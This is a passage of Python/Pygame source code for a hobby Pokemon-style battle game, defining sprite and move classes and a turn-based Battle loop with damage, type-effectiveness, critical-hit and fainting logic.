pygame.SRCALPHA, 32)\r\n\t\tself.surface.fill(self.colour)\r\n\r\n\tdef setColour(self, colour):\r\n\t\tself.colour = colour\r\n\t\tself.surface.fill(self.colour)\r\n\r\n\r\nclass text(myClass):\r\n\tdef __init__(self, content, fontSize=24):\r\n\t\tmyClass.__init__(self)\r\n\t\tself.width = self.surface.get_rect()[2]\r\n\t\tself.height = self.surface.get_rect()[3]\r\n\t\tself.font = 'Pokemon GB.ttf'\r\n\t\tself.fontFam = self.font\r\n\t\tself.fontSize = fontSize\r\n\t\tself.font = pygame.font.SysFont(self.fontFam, self.fontSize)\r\n\t\tself.content = content\r\n\t\tself.surface = self.font.render(self.content, 1, self.colour)\r\n\r\n\tdef setColour(self, colour):\r\n\t\tmyClass.setColour(self, colour)\r\n\t\tself.surface = self.font.render(self.content, 1, self.colour)\r\n\r\n\tdef setFont(self, fontFam):\r\n\t\tself.fontFam = fontFam\r\n\t\tself.font = pygame.font.SysFont(self.fontFam, self.fontSize)\r\n\t\tself.surface = self.font.render(self.content, 1, self.colour)\r\n\r\n\tdef setContent(self, content):\r\n\t\tself.content = content\r\n\t\tself.surface = self.font.render(self.content, 1, self.colour)\r\n\r\n\tdef getText(self):\r\n\t\treturn myClass.getSurface(self)\r\n\r\n\r\nclass mySprite(myClass):\r\n\tdef __init__(self, fileName):\r\n\t\tmyClass.__init__(self)\r\n\t\tself.surface = pygame.image.load(fileName).convert_alpha()\r\n\t\tself.width = self.surface.get_rect()[2]\r\n\t\tself.height = self.surface.get_rect()[3]\r\n\r\n\tdef resize(self, width, height):\r\n\t\tself.width = width\r\n\t\tself.height = height\r\n\t\tself.dim = (self.width, self.height)\r\n\t\tself.surface = pygame.transform.smoothscale(self.getSurface(), self.dim)\r\n\r\n\tdef rotate(self):\r\n\t\tself.surface = pygame.transform.rotate(self.surface, 270)\r\n\r\n\r\nclass attack(mySprite):\r\n\tdef __init__(self, filename, name, damage, powerPoints, type, attackType, accuracy):\r\n\t\tmySprite.__init__(self, filename)\r\n\t\tself.name = name\r\n\t\tself.damage = damage\r\n\t\tself.powerPoints = powerPoints\r\n\t\tself.type = type\r\n\t\tself.attackType = attackType\r\n\t\tself.accuracy = accuracy\r\n\r\n\tdef getDamage(self):\r\n\t\treturn self.damage\r\n\r\n\tdef getType(self):\r\n\t\treturn self.type\r\n\r\n\tdef getAttackType(self):\r\n\t\treturn self.attackType\r\n\r\n\tdef 
getAccuracy(self):\r\n\t\treturn self.accuracy\r\n\r\n\tdef getName(self):\r\n\t\treturn self.name\r\n\r\n\tdef __str__(self):\r\n\t\treturn self.name\r\n\r\n\r\nclass pokemon(mySprite):\r\n\tdef __init__(self, name, filename, type, stats, attacks, weakness, resistance, immunites):\r\n\t\tmySprite.__init__(self, filename)\r\n\t\tself.name = name\r\n\t\tself.type = type\r\n\t\tself.stats = stats\r\n\t\tself.attacks = attacks\r\n\t\tself.weakness = weakness\r\n\t\tself.resistance = resistance\r\n\t\tself.immunites = immunites\r\n\r\n\tdef getName(self):\r\n\t\treturn self.name\r\n\r\n\tdef getType(self):\r\n\t\treturn self.type\r\n\r\n\tdef getStats(self):\r\n\t\treturn self.stats\r\n\r\n\tdef getAttacks(self):\r\n\t\treturn self.attacks\r\n\r\n\tdef getWeakness(self):\r\n\t\treturn self.weakness\r\n\r\n\tdef getResistance(self):\r\n\t\treturn self.resistance\r\n\r\n\tdef getImmunites(self):\r\n\t\treturn self.immunites\r\n\r\n\r\nclass Battle:\r\n\tdef __init__(self):\r\n\t\tself.state = 0\r\n\t\tself.poke1 = 0\r\n\t\tself.poke2 = 0\r\n\t\tself.userWin = 0\r\n\t\tself.cpuWin = 0\r\n\t\tself.attack = 0\r\n\t\tself.immune = 0\r\n\t\tself.end = 0\r\n\t\tself.u = 0 # user index number for party pokemon\r\n\t\tself.c = 0 # cpu index number for party pokemon\r\n\t\tself.spd1 = 0\r\n\t\tself.spd2 = 0\r\n\t\tself.cpuHp = 0\r\n\t\tself.userHp = 0\r\n\t\tself.tempcpuHp = 0\r\n\t\tself.tempUserHp = 0\r\n\t\tself.turns = 0\r\n\t\tself.askAttack = 0\r\n\t\tself.cpuFaint = 0\r\n\t\tself.userFaint = 0\r\n\t\tself.start = 1\r\n\r\n\tdef update(self, pkmnParty1, pkmnParty2, disp, key, bbox): # pkmnparty1 is user, pkmnparty2 is cpu\r\n\t\tif self.cpuWin == 0 and self.userWin == 0: # show the pokemon sprites while no one has won\r\n\t\t\tuserPkN = text(str(pkmnParty1[self.u].getName()), 36)\r\n\t\t\tcpuPkN = text(str(pkmnParty2[self.c].getName()), 36)\r\n\t\t\tuserHp = text(\"Hp: \" + str(self.userHp), 36)\r\n\t\t\tcpuHp = text(\"Hp: \" + str(self.cpuHp), 36)\r\n\t\t\tcpuPkmnName2 = pkmnParty2[self.c].getName()\r\n\t\t\tpkmnName2 = pkmnParty1[self.u].getName()\r\n\t\t\tif self.start == 1:\r\n\t\t\t\tchalText = text(\"You are challenged by\", 36)\r\n\t\t\t\tchalText.setPos((0, 600 - 85))\r\n\t\t\t\tdisp.blit(chalText.getText(), chalText.getPos())\r\n\t\t\t\tchalTextMore = text(\"Battle Tower Trainer!\", 36)\r\n\t\t\t\tchalTextMore.setPos((0, 600 - 45))\r\n\t\t\t\tdisp.blit(chalTextMore.getText(), chalTextMore.getPos())\r\n\t\t\t\tpygame.display.flip()\r\n\t\t\t\ttime.sleep(3)\r\n\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\tbatIntroText = text(\"Battle Tower Trainer\", 36)\r\n\t\t\t\tmorebatText = text(\"sent out \" + str(cpuPkmnName2), 36)\r\n\t\t\t\tbatIntroText.setPos((0, 600 - 85))\r\n\t\t\t\tdisp.blit(batIntroText.getText(), batIntroText.getPos())\r\n\t\t\t\tmorebatText.setPos((0, 600 - 45))\r\n\t\t\t\tdisp.blit(morebatText.getText(), morebatText.getPos())\r\n\t\t\t\tpygame.display.flip()\r\n\t\t\t\ttime.sleep(3)\r\n\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\tuserBatText = text(\"You sent out \" + str(pkmnName2), 36)\r\n\t\t\t\tuserBatText.setPos((0, 600 - 85))\r\n\t\t\t\tdisp.blit(userBatText.getText(), userBatText.getPos())\r\n\t\t\t\tpygame.display.flip()\r\n\t\t\t\ttime.sleep(2)\r\n\t\t\t\tself.start = 0\r\n\t\t\tuserPkN.setPos((800 - 200, 400))\r\n\t\t\tcpuPkN.setPos((0, 30))\r\n\t\t\tuserHp.setPos((800 - 200, 450))\r\n\t\t\tcpuHp.setPos((0, 60))\r\n\t\t\tdisp.blit(userPkN.getText(), userPkN.getPos())\r\n\t\t\tdisp.blit(cpuPkN.getText(), 
cpuPkN.getPos())\r\n\t\t\tdisp.blit(userHp.getText(), userHp.getPos())\r\n\t\t\tdisp.blit(cpuHp.getText(), cpuHp.getPos())\r\n\t\t\tdisp.blit(pkmnParty1[self.u].getSurface(), pkmnParty1[self.u].getPos())\r\n\t\t\tdisp.blit(pkmnParty2[self.c].getSurface(), pkmnParty2[self.c].getPos())\r\n\r\n\r\n\t\tif self.state == 0: # at the beginning of a turn get the speed of each pokemon to determine who goes first\r\n\t\t\tself.spd1 = pkmnParty1[self.u].getStats()[5]\r\n\t\t\tself.spd2 = pkmnParty2[self.c].getStats()[5]\r\n\r\n\r\n\t\t\tif self.spd1 > self.spd2:\r\n\t\t\t\tself.poke1 = 1\r\n\t\t\telse:\r\n\t\t\t\tself.poke2 = 1\r\n\r\n\t\t\tself.state = 1\r\n\r\n\t\tif self.state == 1: # get the Hp stat of each pokemon or if a pokemon dies get the new hp of only that pokemon\r\n\r\n\t\t\tif self.cpuFaint == 1:\r\n\t\t\t\tself.tempcpuHp = pkmnParty2[self.c].getStats()[0] # get Hp of cpu\r\n\t\t\t\t# hp calc\r\n\t\t\t\tself.cpuHp = 2 * self.tempcpuHp * 50\r\n\t\t\t\tself.cpuHp = self.cpuHp / 100\r\n\t\t\t\tself.cpuHp = self.cpuHp + 60\r\n\t\t\t\tself.state = 2\r\n\t\t\t\tself.cpuFaint = 0\r\n\r\n\t\t\telif self.userFaint == 1:\r\n\t\t\t\tself.tempUserHp = pkmnParty1[self.u].getStats()[0] # get Hp of user\r\n\t\t\t\t# hp calc\r\n\t\t\t\tself.userHp = 2 * self.tempUserHp * 50\r\n\t\t\t\tself.userHp = self.userHp / 100\r\n\t\t\t\tself.userHp = self.userHp + 60\r\n\t\t\t\tself.state = 2\r\n\t\t\t\tself.userFaint = 0\r\n\r\n\r\n\t\t\telif self.turns == 0:\r\n\t\t\t\tself.tempcpuHp = pkmnParty2[self.c].getStats()[0] # get Hp of cpu\r\n\t\t\t\t# hp calc\r\n\t\t\t\tself.cpuHp = 2 * self.tempcpuHp * 50\r\n\t\t\t\tself.cpuHp = self.cpuHp / 100\r\n\t\t\t\tself.cpuHp = self.cpuHp + 60\r\n\r\n\t\t\t\tself.tempUserHp = pkmnParty1[self.u].getStats()[0] # get Hp of user\r\n\t\t\t\t# hp calc\r\n\t\t\t\tself.userHp = 2 * self.tempUserHp * 50\r\n\t\t\t\tself.userHp = self.userHp / 100\r\n\t\t\t\tself.userHp = self.userHp + 60\r\n\t\t\t\tself.state = 2\r\n\r\n\t\t\tself.cpuHp = int(self.cpuHp)\r\n\t\t\tself.userHp = int(self.userHp)\r\n\t\tif self.state == 2: # get the input from the user to choose what attack to use\r\n\t\t\tattk1 = pkmnParty1[self.u].getAttacks()[0]\r\n\t\t\tattN1 = text(\"(1) \" + str(attk1), 36)\r\n\t\t\tattN1.setPos((0, 600 - 85))\r\n\t\t\tattk2 = pkmnParty1[self.u].getAttacks()[1]\r\n\t\t\tattN2 = text(\"(2) \" + str(attk2), 36)\r\n\t\t\tattN2.setPos((0, 600 - 45))\r\n\t\t\tdisp.blit(attN1.getText(), attN1.getPos())\r\n\t\t\tdisp.blit(attN2.getText(), attN2.getPos())\r\n\t\t\tself.askAttack = 0\r\n\t\t\tif key[pygame.K_1]:\r\n\t\t\t\tself.askAttack = 1\r\n\t\t\t\tself.turns = 0\r\n\t\t\t\tself.state = 3\r\n\t\t\telif key[pygame.K_2]:\r\n\t\t\t\tself.askAttack = 2\r\n\t\t\t\tself.turns = 0\r\n\t\t\t\tself.state = 3\r\n\t\t\treturn\r\n\r\n\t\tif self.state == 3:\r\n\t\t\tif self.turns == 2: # if a turn has passed and no one fainted go back to state 2 to get attack inputs\r\n\t\t\t\tself.state = 2\r\n\t\t\t\treturn\r\n\r\n\t\t\tif self.poke1 == 1: # user's turn\r\n\t\t\t\tpkmnName = pkmnParty1[self.u].getName()\r\n\t\t\t\tpkmnAttkName = pkmnParty1[self.u].getAttacks()[self.askAttack - 1]\r\n\r\n\t\t\t\t# text stuff\r\n\t\t\t\tpkAction = text(str(pkmnName) + \" used \" + str(pkmnAttkName), 36)\r\n\t\t\t\tpkAction.setPos((0, 600 - 45))\r\n\t\t\t\tmonkey = 1\r\n\t\t\t\tif monkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\tdisp.blit(pkAction.getText(), pkAction.getPos())\r\n\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\tdisp.blit(bbox.getSurface(), 
bbox.getPos())\r\n\t\t\t\t\tmonkey = 0\r\n\r\n\t\t\t\tattTimer = 1\r\n\t\t\t\tif attTimer == 1: # make attack appear for 1 second\r\n\t\t\t\t\tdisp.blit(pkmnParty1[self.u].getAttacks()[self.askAttack - 1].getSurface(), pkmnParty1[self.u].getAttacks()[self.askAttack - 1].getPos())\r\n\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\t\tattTimer = 0\r\n\r\n\t\t\t\ttypeAttack = pkmnParty1[self.u].getAttacks()[self.askAttack - 1].getType() # get the type of attack (rock, ground, etc.)\r\n\t\t\t\tfor i in range(len(pkmnParty2[self.c].getImmunites())): # check for immunities\r\n\t\t\t\t\tif typeAttack == pkmnParty2[self.c].getImmunites()[i]:\r\n\t\t\t\t\t\timmText = text(\"It does not affect \" + str(pkmnParty2[self.c].getName()), 36)\r\n\t\t\t\t\t\timmText.setPos((0, 600-45))\r\n\t\t\t\t\t\tooga = 1\r\n\t\t\t\t\t\tif ooga == 1:\r\n\t\t\t\t\t\t\tdisp.blit(immText.getText(), immText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tooga = 0\r\n\t\t\t\t\t\tself.immune = 1\r\n\t\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\t\tself.poke2 = 1\r\n\t\t\t\t\t\treturn\r\n\r\n\t\t\t\tpokeAccur = random.randint(1, 100) # choose random number\r\n\t\t\t\tif pokeAccur > pkmnParty1[self.u].getAttacks()[self.askAttack - 1].getAccuracy(): # check if move hits based on attack accuracy\r\n\t\t\t\t\tmissText = text(str(pkmnParty2[self.c].getName()) + \" avoided the attack\", 36)\r\n\t\t\t\t\tmissText.setPos((0, 600 - 45))\r\n\t\t\t\t\tbooga = 1\r\n\t\t\t\t\tif booga == 1:\r\n\t\t\t\t\t\tdisp.blit(missText.getText(), missText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\tbooga = 0\r\n\t\t\t\t\tself.turns += 1\r\n\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\tself.poke2 = 1\r\n\t\t\t\t\treturn\r\n\r\n\t\t\t\tattack = pkmnParty1[self.u].getAttacks()[self.askAttack - 1].getDamage() # get damage of chosen attack\r\n\r\n\t\t\t\tattackType = pkmnParty1[self.u].getAttacks()[\r\n\t\t\t\t\tself.askAttack - 1].getAttackType() # check if attack is physical or special\r\n\r\n\t\t\t\tif attackType == 1: # get the appropriate defense based on the attack type\r\n\t\t\t\t\tcpuDef = pkmnParty2[self.c].getStats()[2]\r\n\t\t\t\telse:\r\n\t\t\t\t\tcpuDef = pkmnParty2[self.c].getStats()[4]\r\n\r\n\t\t\t\tif attackType == 1: # get the appropriate attack stat based on the attack type\r\n\t\t\t\t\tpkmnAttk = pkmnParty1[self.u].getStats()[1]\r\n\t\t\t\telse:\r\n\t\t\t\t\tpkmnAttk = pkmnParty1[self.u].getStats()[3]\r\n\r\n\t\t\t\t#print(\"initial cpu Hp: \" + str(self.cpuHp))\r\n\r\n\t\t\t\t# damage calc\r\n\t\t\t\tdamage = 2 * 50\r\n\t\t\t\tdamage = damage / 5\r\n\t\t\t\tdamage += 2\r\n\t\t\t\tdamage = damage * attack\r\n\t\t\t\tdamage = damage * pkmnAttk\r\n\t\t\t\tdamage = damage / cpuDef\r\n\t\t\t\tdamage = damage / 50\r\n\t\t\t\tdamage += 2\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty1[\r\n\t\t\t\t\t\t\t\t\t self.u].getType())): # checks if attack is STAB (same type attack bonus) and if so multiply attack by 1.5\r\n\t\t\t\t\tif typeAttack == pkmnParty1[self.u].getType()[i]:\r\n\t\t\t\t\t\tdamage = damage * 1.5\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tpass\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty2[self.c].getWeakness())): # checks if attack is super effective\r\n\t\t\t\t\tif typeAttack == pkmnParty2[self.c].getWeakness()[i]:\r\n\t\t\t\t\t\tdamage = damage * 2\r\n\t\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\t\t\tsupText = text(\"Its super 
effective\", 36)\r\n\t\t\t\t\t\tsupText.setPos((0, 600 - 45))\r\n\t\t\t\t\t\tmonkeyagg = 1\r\n\t\t\t\t\t\tif monkeyagg == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\t\tdisp.blit(supText.getText(), supText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tmonkeyagg = 0\r\n\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty2[self.c].getResistance())): # checks if attack is not very effective\r\n\t\t\t\t\tif typeAttack == pkmnParty2[self.c].getResistance()[i]:\r\n\t\t\t\t\t\tdamage = damage * 0.5\r\n\t\t\t\t\t\tnotText = text(\"Its not very effective\", 36)\r\n\t\t\t\t\t\tnotText.setPos((0, 600 - 45))\r\n\t\t\t\t\t\tmoremonkey = 1\r\n\t\t\t\t\t\tif moremonkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\t\tdisp.blit(notText.getText(), notText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tmoremonkey = 0\r\n\r\n\t\t\t\tcrit = random.randint(1, 100)\r\n\t\t\t\tif crit > 96: # check for a critical hit (4.16 % chance)\r\n\t\t\t\t\tdamage = damage * 1.5\r\n\t\t\t\t\tcritText = text(\"A critical hit!\", 36)\r\n\t\t\t\t\tcritText.setPos((0, 600 - 45))\r\n\t\t\t\t\tmonkeymoremanmonkey = 1\r\n\t\t\t\t\tif monkeymoremanmonkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\tdisp.blit(critText.getText(), critText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\tmonkeymoremanmonkey = 0\r\n\r\n\t\t\t\telse:\r\n\t\t\t\t\tpass\r\n\r\n\t\t\t\troll = random.randint(1, 25)\r\n\t\t\t\tdamage = damage - roll\r\n\r\n\t\t\t\tif self.immune == 1:\r\n\t\t\t\t\tdamage = 0\r\n\t\t\t\t\tself.immune = 0\r\n\r\n\t\t\t\t#print(\"damage given: \" + str(damage))\r\n\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\tself.cpuHp = self.cpuHp - damage\r\n\t\t\t\tself.cpuHp = int(self.cpuHp)\r\n\t\t\t\tif self.cpuHp < 0:\r\n\t\t\t\t\tself.cpuHp = 0\r\n\r\n\t\t\t\t\tfaintText = text(str(pkmnParty2[self.c].getName()) + \" fainted\", 36)\r\n\t\t\t\t\tfaintText.setPos((0, 600 - 45))\r\n\t\t\t\t\tmonkeyman = 1\r\n\t\t\t\t\tif monkeyman == 1:\r\n\t\t\t\t\t\tdisp.blit(faintText.getText(), faintText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\tmonkeyman = 0\r\n\r\n\t\t\t\t\tpkmnParty2.pop(self.c)\r\n\r\n\t\t\t\t\tself.cpuFaint = 1\r\n\t\t\t\t\t#print(\"final cpuHP: \" + str(self.cpuHp))\r\n\t\t\t\t\tif len(pkmnParty2) == 0:\r\n\t\t\t\t\t\tself.userWin = 1\r\n\t\t\t\t\t\tself.poke2 = 0\r\n\t\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\t\treturn\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\t#print(\"mons fainted\")\r\n\t\t\t\t\t\tself.state = 0\r\n\t\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\t\tself.poke2 = 1\r\n\t\t\t\t\t\treturn\r\n\r\n\t\t\t\t#print(\"final cpuHP: \" + str(self.cpuHp))\r\n\t\t\t\tself.poke1 = 0\r\n\t\t\t\tself.poke2 = 1\r\n\t\t\t\tself.turns += 1\r\n\t\t\t\treturn\r\n\r\n\r\n\r\n\r\n\r\n\t\t\tif self.poke2 == 1: ### CPUS TURN\r\n\t\t\t\t#print(self.cpuHp)\r\n\t\t\t\tcpuAttacks = pkmnParty2[self.c].getAttacks()\r\n\t\t\t\tcpuAskAttack = cpuAttacks[0]\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty1[self.u].getWeakness())): # cpu checks if it has a super effective attack so it will use it\r\n\t\t\t\t\tfor j in range(len(cpuAttacks)):\r\n\t\t\t\t\t\tif cpuAttacks[j].getType() == pkmnParty1[self.u].getWeakness()[i]:\r\n\t\t\t\t\t\t\tcpuAskAttack = 
cpuAttacks[j]\r\n\t\t\t\t\t\t\t#print(cpuAskAttack)\r\n\r\n\t\t\t\tcpuTypeAttack = cpuAskAttack.getType()\r\n\t\t\t\tfor i in range(len(pkmnParty1[self.u].getImmunites())): # check for immunities\r\n\t\t\t\t\tif cpuAskAttack.getType() != pkmnParty1[self.u].getImmunites()[i]:\r\n\t\t\t\t\t\tpass\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tcpuAskAttack = cpuAttacks[1]\r\n\t\t\t\t\tif cpuTypeAttack == pkmnParty1[self.u].getImmunites()[i]:\r\n\t\t\t\t\t\timmText = text(\"It does not affect \" + str(pkmnParty1[self.u].getName()), 36)\r\n\t\t\t\t\t\timmText.setPos((0, 600-45))\r\n\t\t\t\t\t\tooga = 1\r\n\t\t\t\t\t\tif ooga == 1:\r\n\t\t\t\t\t\t\tdisp.blit(immText.getText(), immText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tooga = 0\r\n\t\t\t\t\t\tself.immune = 1\r\n\t\t\t\t\t\tself.poke1 = 1\r\n\t\t\t\t\t\tself.poke2 = 0\r\n\t\t\t\t\t\treturn\r\n\r\n\r\n\r\n\r\n\t\t\t\tcpuPkmnName = pkmnParty2[self.c].getName()\r\n\t\t\t\tcpuPkmnAttkName = cpuAskAttack.getName()\r\n\t\t\t\t# text stuff\r\n\t\t\t\tcpuAction = text(str(cpuPkmnName) + \" used \" + str(cpuPkmnAttkName), 36)\r\n\t\t\t\tcpuAction.setPos((0, 600 - 45))\r\n\t\t\t\tcpumonkey = 1\r\n\t\t\t\tif cpumonkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\tdisp.blit(cpuAction.getText(), cpuAction.getPos())\r\n\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\tcpumonkey = 0\r\n\r\n\t\t\t\tattTimer = 1\r\n\t\t\t\tif attTimer == 1: # make attack appear for 1 second\r\n\t\t\t\t\tdisp.blit(cpuAskAttack.getSurface(), cpuAskAttack.getPos())\r\n\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\ttime.sleep(1)\r\n\t\t\t\t\tattTimer = 0\r\n\r\n\t\t\t\tcpuTypeAttack = cpuAskAttack.getType() # get the type of attack (rock, ground, etc.)\r\n\t\t\t\tcpupokeAccur = random.randint(1, 100) # choose random number\r\n\t\t\t\tif cpupokeAccur > cpuAskAttack.getAccuracy(): # check if move hits based on attack accuracy\r\n\t\t\t\t\tmissText = text(str(pkmnParty1[self.u].getName()) + \" avoided the attack\", 36)\r\n\t\t\t\t\tmissText.setPos((0, 600 - 45))\r\n\t\t\t\t\tbooga = 1\r\n\t\t\t\t\tif booga == 1:\r\n\t\t\t\t\t\tdisp.blit(missText.getText(), missText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2)\r\n\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\tbooga = 0\r\n\t\t\t\t\tself.poke1 = 1\r\n\t\t\t\t\tself.poke2 = 0\r\n\t\t\t\t\treturn\r\n\r\n\t\t\t\tcpuAttack = cpuAskAttack.getDamage() # damage of cpu's attack\r\n\r\n\t\t\t\tcpuAttackType = cpuAskAttack.getAttackType() # check if attack is physical or special\r\n\r\n\t\t\t\tif cpuAttackType == 1: # get the appropriate defense based on the attack type\r\n\t\t\t\t\tuserDef = pkmnParty1[self.u].getStats()[2]\r\n\t\t\t\telse:\r\n\t\t\t\t\tuserDef = pkmnParty1[self.u].getStats()[4]\r\n\r\n\t\t\t\tif cpuAttackType == 1: # get the appropriate attack stat based on the attack type\r\n\t\t\t\t\tcpupkmnAttk = pkmnParty2[self.c].getStats()[1]\r\n\t\t\t\telse:\r\n\t\t\t\t\tcpupkmnAttk = pkmnParty2[self.c].getStats()[3]\r\n\r\n\t\t\t\t#print(\"initial user hp: \" + str(self.userHp))\r\n\r\n\t\t\t\t# damage calc\r\n\t\t\t\tcpuDamage = 2 * 50\r\n\t\t\t\tcpuDamage = cpuDamage / 5\r\n\t\t\t\tcpuDamage += 2\r\n\t\t\t\tcpuDamage = cpuDamage * cpuAttack\r\n\t\t\t\tcpuDamage = cpuDamage * cpupkmnAttk\r\n\t\t\t\tcpuDamage = cpuDamage / userDef\r\n\t\t\t\tcpuDamage = cpuDamage / 50\r\n\t\t\t\tcpuDamage += 
2\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty2[self.c].getType())): # checks if attack is STAB (same type attack bonus) and if so multiply attack by 1.5\r\n\t\t\t\t\tif cpuTypeAttack == pkmnParty2[self.c].getType()[i]:\r\n\t\t\t\t\t\tcpuDamage = cpuDamage * 1.5\r\n\t\t\t\t\telse:\r\n\t\t\t\t\t\tpass\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty1[self.u].getWeakness())): # checks if attack is super effective\r\n\t\t\t\t\tif cpuTypeAttack == pkmnParty1[self.u].getWeakness()[i]:\r\n\t\t\t\t\t\tcpuDamage = cpuDamage * 2\r\n\t\t\t\t\t\tsupText = text(\"Its super effective\", 36)\r\n\t\t\t\t\t\tsupText.setPos((0, 600 - 45))\r\n\t\t\t\t\t\tmonkeyagg = 1\r\n\t\t\t\t\t\tif monkeyagg == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\t\tdisp.blit(supText.getText(), supText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tmonkeyagg = 0\r\n\r\n\t\t\t\tfor i in range(len(pkmnParty1[self.u].getResistance())): # checks if attack is not very effective\r\n\t\t\t\t\tif cpuTypeAttack == pkmnParty1[self.u].getResistance()[i]:\r\n\t\t\t\t\t\tcpuDamage = cpuDamage * 0.5\r\n\t\t\t\t\t\tnotText = text(\"Its not very effective\", 36)\r\n\t\t\t\t\t\tnotText.setPos((0, 600 - 45))\r\n\t\t\t\t\t\tmoremonkey = 1\r\n\t\t\t\t\t\tif moremonkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\t\tdisp.blit(notText.getText(), notText.getPos())\r\n\t\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\t\t\t\t\t\t\tmoremonkey = 0\r\n\r\n\t\t\t\tcpucrit = random.randint(1, 100)\r\n\t\t\t\tif cpucrit > 96: # check for a critical hit (4.16 % chance)\r\n\t\t\t\t\tcpuDamage = cpuDamage * 1.5\r\n\t\t\t\t\tcritText = text(\"A critical hit!\", 36)\r\n\t\t\t\t\tcritText.setPos((0, 600 - 45))\r\n\t\t\t\t\tmonkeymoremanmonkey = 1\r\n\t\t\t\t\tif monkeymoremanmonkey == 1: # make text appear for 3 seconds\r\n\t\t\t\t\t\tdisp.blit(critText.getText(), critText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\tmonkeymoremanmonkey = 0\r\n\t\t\t\telse:\r\n\t\t\t\t\tpass\r\n\r\n\t\t\t\tif self.immune == 1:\r\n\t\t\t\t\tcpuDamage = 0\r\n\t\t\t\t\tself.immune = 0\r\n\t\t\t\t#print(\"damage given from cpu: \" + str(cpuDamage))\r\n\r\n\t\t\t\tself.userHp = self.userHp - cpuDamage\r\n\t\t\t\tself.userHp = int(self.userHp)\r\n\t\t\t\t#print(\"final user Hp: \" + str(self.userHp))\r\n\t\t\t\tdisp.blit(bbox.getSurface(), bbox.getPos())\r\n\r\n\r\n\t\t\t\tif self.userHp < 0:\r\n\t\t\t\t\tself.userHp = 0\r\n\t\t\t\t\tfaintText = text(str(pkmnParty1[self.u].getName()) + \" fainted\", 36)\r\n\t\t\t\t\tfaintText.setPos((0, 600 - 45))\r\n\t\t\t\t\tmonkeyman = 1\r\n\t\t\t\t\tif monkeyman == 1:\r\n\t\t\t\t\t\tdisp.blit(faintText.getText(), faintText.getPos())\r\n\t\t\t\t\t\tpygame.display.flip()\r\n\t\t\t\t\t\ttime.sleep(2.5)\r\n\t\t\t\t\t\tmonkeyman = 0\r\n\t\t\t\t\tpkmnParty1.pop(self.u)\r\n\t\t\t\t\t#print(\"monkey faint activated\")\r\n\t\t\t\t\tself.userFaint = 1\r\n\t\t\t\t\t#print(self.userFaint)\r\n\t\t\t\t\t#print(\"final user Hp: \" + str(self.userHp))\r\n\t\t\t\t\tif len(pkmnParty1) == 0:\r\n\t\t\t\t\t\t#print('monkey')\r\n\t\t\t\t\t\tself.poke2 = 0\r\n\t\t\t\t\t\tself.poke1 = 0\r\n\t\t\t\t\t\tself.cpuWin = 